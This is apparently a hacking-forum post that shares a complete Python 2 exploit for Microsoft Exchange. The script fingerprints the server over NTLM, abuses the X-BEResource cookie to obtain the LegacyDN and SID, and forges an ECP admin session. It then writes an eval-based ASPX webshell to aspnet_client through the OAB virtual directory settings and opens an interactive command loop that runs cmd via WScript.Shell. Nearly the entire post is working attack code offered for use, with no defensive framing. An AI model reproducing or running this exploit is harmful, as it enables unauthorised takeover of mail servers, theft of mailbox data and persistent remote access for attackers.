Shacker

POC exchange-rce-exp

Shacker已验证会员

黑客倉庫站長

贡献: 21%
Python:
#!/usr/bin/python2
# coding: UTF-8

import re
import sys
import json
import string
import requests
from urllib import urlencode
from tld import get_fld
from struct import unpack
from base64 import b64encode, b64decode
from requests.packages.urllib3.exceptions import InsecureRequestWarning


def title():
    print('+------------------------------------------')
    print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')
    print('+  \033[34mGithub : https://github.com/PeiQi0                                 \033[0m')
    print('+  \033[34m公众号 : PeiQi文库                                                \033[0m')
    print('+  \033[34mVersion: Microsoft Exchang 多个版本                                \033[0m')
    print('+  \033[36m使用格式:  python exp.py                                           \033[0m')
    print('+  \033[36mUrl         >>> mail.xxx.org                                       \033[0m')
    print('+  \033[36mEmail       >>> Administrator@根域名  (默认)                        \033[0m')
    print('+------------------------------------------')


def _unpack_str(byte_string):
    return byte_string.decode('UTF-8').replace('\x00', '')


def _unpack_int(format, data):
    return unpack(format, data)[0]


def parse_challenge(Negotiate_base64_decode):
    target_info_field = Negotiate_base64_decode[40:48]
    target_info_len = _unpack_int('H', target_info_field[0:2])
    target_info_offset = _unpack_int('I', target_info_field[4:8])

    target_info_bytes = Negotiate_base64_decode[target_info_offset:target_info_offset + target_info_len]

    domain_name = ''
    computer_name = ''
    info_offset = 0
    while info_offset < len(target_info_bytes):
        av_id = _unpack_int('H', target_info_bytes[info_offset:info_offset + 2])
        av_len = _unpack_int('H', target_info_bytes[info_offset + 2:info_offset + 4])
        av_value = target_info_bytes[info_offset + 4:info_offset + 4 + av_len]

        info_offset = info_offset + 4 + av_len
        if av_id == 2:  # MsvAvDnsDomainName
            domain_name = _unpack_str(av_value)
        elif av_id == 3:  # MsvAvDnsComputerName
            computer_name = _unpack_str(av_value)

    if domain_name and computer_name:
        return domain_name, computer_name
    else:
        print("\033[31m[x] 计算机名称或域名称获取失败")
        sys.exit(0)


def POC_1(target_url, Email):
    print("\033[32m[o] 正在获取 计算机名称和域名称.....\033[0m")
    ntlm_type1 = (
        'NTLMSSP\x00'  # NTLMSSp签名
        '\x01\x00\x00\x00'  # 信息类型
        '\x97\x82\x08\xe2'  # 标记
        '\x00\x00\x00\x00\x00\x00\x00\x00'  # 域名称字符
        '\x00\x00\x00\x00\x00\x00\x00\x00'  # 工作字符
        '\x0a\x00\xba\x47\x00\x00\x00\x0f'  # 系统版本
    )
    headers = {
        'Authorization': 'Negotiate {}'.format(b64encode(ntlm_type1))
    }
    basic_url = 'https://{}/rpc/'.format(target_url)
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    response = requests.get(url=basic_url, headers=headers, verify=False)
    if response.status_code == 401:
        Negotiate_base64_encode = response.headers['WWW-Authenticate']
        Negotiate_base64_decode = re.search('Negotiate ([A-Za-z0-9/+=]+)', Negotiate_base64_encode).group(1)
        domain_name, computer_name = parse_challenge(b64decode(Negotiate_base64_decode))
        print("\033[32m[o] 计算机名称: {}\033[0m".format(computer_name))
        print("\033[32m[o] 域名称:    {}\033[0m".format(domain_name))
        POC_2(target_url, Email, computer_name)
    else:
        print("\033[31m[x] 获取失败")
        sys.exit(0)


def POC_2(target_url, Email, computer_name):
    payload = '''
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
    <Request>
         <EMailAddress>%s</EMailAddress>
        <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
    </Request>
</Autodiscover>
    ''' % Email
    vuln_url = '/autodiscover/autodiscover.xml'
    headers = {
        'User-Agent': 'ExchangeServicesClient/0.0.0.0',
        'Content-Type': 'text/xml',
        'Cookie': 'X-BEResource=a]@{}:444{}?#~1941962753'.format(computer_name, vuln_url),
        'msExchLogonMailbox': 'S-1-5-20'
    }
    url = "https://{}/ecp/PeiQi.js".format(target_url)
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    response = requests.post(url, headers=headers, data=payload, verify=False, allow_redirects=False)
    LegacyDN = re.findall(r'<LegacyDN>(.*?)</LegacyDN>', response.text)[0]
    print("\033[32m[o] LegacyDN: {}\033[0m".format(LegacyDN))

    vuln_url = '/mapi/emsmdb/'
    headers = {
        'X-Clientapplication': 'Outlook/15.0.4815.1002',
        'X-Requestid': 'x',
        'X-Requesttype': 'Connect',
        'Cookie': 'X-BEResource=a]@{}:444{}?#~1941962753'.format(computer_name, vuln_url),
        'Content-Type': 'application/mapi-http',
        'msExchLogonMailbox': 'S-1-5-20',
    }
    payload = LegacyDN + '\x00\x00\x00\x00\x00\x20\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00'
    url = "https://{}/ecp/PeiQi.js".format(target_url)
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    response = requests.post(url, headers=headers, data=payload, verify=False, allow_redirects=False)
    SID = re.search('with SID ([S\-0-9]+) ', response.content).group(1)
    print("\033[32m[o] SID: {}\033[0m".format(SID))

    vuln_url = '/ecp/proxyLogon.ecp'
    payload = '<r at="NTLM" ln="%s"><s t="0">%s</s></r>' % (Email.split('@')[0], SID)
    headers = {
        'X-Clientapplication': 'Outlook/15.0.4815.1002',
        'X-Requestid': 'x',
        'X-Requesttype': 'Connect',
        'Cookie': 'X-BEResource=a]@{}:444{}?#~1941962753'.format(computer_name, vuln_url),
        'Content-Type': 'application/json',
        'msExchLogonMailbox': 'S-1-5-20',
    }
    url = "https://{}/ecp/PeiQi.js".format(target_url)
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    response = requests.post(url, headers=headers, data=payload, verify=False, allow_redirects=False)
    session_id = response.cookies.get('ASP.NET_SessionId')
    canary = response.cookies.get('msExchEcpCanary')
    print("\033[32m[o] Session_id: {}\033[0m".format(session_id))
    print("\033[32m[o] Canary    : {}\033[0m".format(canary))

    extra_cookies = [
        'ASP.NET_SessionId=' + session_id,
        'msExchEcpCanary=' + canary
    ]
    vuln_url = '/ecp/DDI/DDIService.svc/GetObject'
    qs = urlencode({
        'schema': 'OABVirtualDirectory',
        'msExchEcpCanary': canary
    })
    headers = {
        'X-Clientapplication': 'Outlook/15.0.4815.1002',
        'X-Requestid': 'x',
        'X-Requesttype': 'Connect',
        'Cookie': 'X-BEResource=a]@{}:444{}?{}#~1941962753;ASP.NET_SessionId={};msExchEcpCanary={}'.format(
            computer_name, vuln_url, qs, session_id, canary),
        'Content-Type': 'application/json',
        'msExchLogonMailbox': 'S-1-5-20',
    }
    url = "https://{}/ecp/PeiQi.js".format(target_url)
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    response = requests.post(url, headers=headers, data='', verify=False, allow_redirects=False)
    identity = response.json()['d']['Output'][0]['Identity']
    print("\033[32m[o] OAB Name: {}\033[0m".format(identity['DisplayName']))
    print("\033[32m[o] OAB ID: {}\033[0m".format(identity['RawIdentity']))

    FILE_PATH = 'C:\\inetpub\\wwwroot\\aspnet_client\\PeiQi.aspx'
    FILE_DATA = '<script language="JScript" runat="server">function Page_Load(){eval(Request["PeiQi"],"unsafe");}</script>'

    vuln_url = '/ecp/DDI/DDIService.svc/SetObject'
    qs = urlencode({
        'schema': 'OABVirtualDirectory',
        'msExchEcpCanary': canary
    })
    payload = json.dumps({
        'identity': {
            '__type': 'Identity:ECP',
            'DisplayName': identity['DisplayName'],
            'RawIdentity': identity['RawIdentity']
        },
        'properties': {
            'Parameters': {
                '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',
                'ExternalUrl': 'http://f/' + FILE_DATA
            }
        }
    })
    headers = {
        'X-Clientapplication': 'Outlook/15.0.4815.1002',
        'X-Requestid': 'x',
        'X-Requesttype': 'Connect',
        'Cookie': 'X-BEResource=a]@{}:444{}?{}#~1941962753;ASP.NET_SessionId={};msExchEcpCanary={}'.format(
            computer_name, vuln_url, qs, session_id, canary),
        'Content-Type': 'application/json',
        'msExchLogonMailbox': 'S-1-5-20',
    }
    url = "https://{}/ecp/PeiQi.js".format(target_url)
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    response = requests.post(url, headers=headers, data=payload, verify=False, allow_redirects=False)
    if response.status_code == 200:
        print("\033[32m[o] 通过OAB设置Webshell成功\033[0m")

    vuln_url = "/ecp/DDI/DDIService.svc/SetObject"
    qs = urlencode({
        'schema': 'ResetOABVirtualDirectory',
        'msExchEcpCanary': canary
    })
    payload = json.dumps({
        'identity': {
            '__type': 'Identity:ECP',
            'DisplayName': identity['DisplayName'],
            'RawIdentity': identity['RawIdentity']
        },
        'properties': {
            'Parameters': {
                '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',
                'FilePathName': FILE_PATH
            }
        }
    })
    headers = {
        'X-Clientapplication': 'Outlook/15.0.4815.1002',
        'X-Requestid': 'x',
        'X-Requesttype': 'Connect',
        'Cookie': 'X-BEResource=a]@{}:444{}?{}#~1941962753;ASP.NET_SessionId={};msExchEcpCanary={}'.format(
            computer_name, vuln_url, qs, session_id, canary),
        'Content-Type': 'application/json',
        'msExchLogonMailbox': 'S-1-5-20',
    }
    url = "https://{}/ecp/PeiQi.js".format(target_url)
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    response = requests.post(url, headers=headers, data=payload, verify=False, allow_redirects=False)
    if response.status_code == 200:
        print("\033[32m[o] 正在尝试写入Webshell\033[0m")

    vuln_url = "/ecp/DDI/DDIService.svc/SetObject"
    qs = urlencode({
        'schema': 'OABVirtualDirectory',
        'msExchEcpCanary': canary
    })
    payload = json.dumps({
        'identity': {
            '__type': 'Identity:ECP',
            'DisplayName': identity['DisplayName'],
            'RawIdentity': identity['RawIdentity']
        },
        'properties': {
            'Parameters': {
                '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',
                'ExternalUrl': ''
            }
        }
    })
    headers = {
        'X-Clientapplication': 'Outlook/15.0.4815.1002',
        'X-Requestid': 'x',
        'X-Requesttype': 'Connect',
        'Cookie': 'X-BEResource=a]@{}:444{}?{}#~1941962753;ASP.NET_SessionId={};msExchEcpCanary={}'.format(
            computer_name, vuln_url, qs, session_id, canary),
        'Content-Type': 'application/json',
        'msExchLogonMailbox': 'S-1-5-20',
    }
    url = "https://{}/ecp/PeiQi.js".format(target_url)
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    response = requests.post(url, headers=headers, data=payload, verify=False, allow_redirects=False)
    print("\033[32m[o] 清除 OAB\033[0m")
    print("\033[32m[o] 正在验证 Webshell是否上传成功..........\033[0m")
    webshell_url = "https://" + target_url + "/aspnet_client/PeiQi.aspx"
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    response = requests.get(url=webshell_url, verify=False, allow_redirects=False)
    if response.status_code == 200 and "Name" in response.text:
        print("\033[32m[o] 上传 Webshll成功, 地址为:{}\033[0m".format("https://" + target_url + "/aspnet_client/PeiQi.aspx"))
        print("\033[32m[o] 响应为:\n{}\033[0m".format(response.text))
        while True:
            Cmd = str(raw_input("\033[35mCmd >>> \033[0m"))
            requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
            Cmd_url = "https://" + target_url + '/aspnet_client/PeiQi.aspx?PeiQi=Response.Write(new%20ActiveXObject("WScript.Shell").exec("cmd /c {}").StdOut.ReadAll());'.format(Cmd)
            response = requests.get(url=Cmd_url, verify=False, allow_redirects=False)
            print("\033[32m[o] 响应为:\n{}\033[0m".format(response.text))


if __name__ == '__main__':
    reload(sys) 
    sys.setdefaultencoding('utf8') 
    title()
    target_url = str(raw_input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
    Email = "Administrator@{}".format(get_fld("https://" + target_url))
    print("\033[32m[o] 请求地址:{},使用的邮箱:{}\033[0m".format(target_url, Email))
    POC_1(target_url, Email)
 
后退
顶部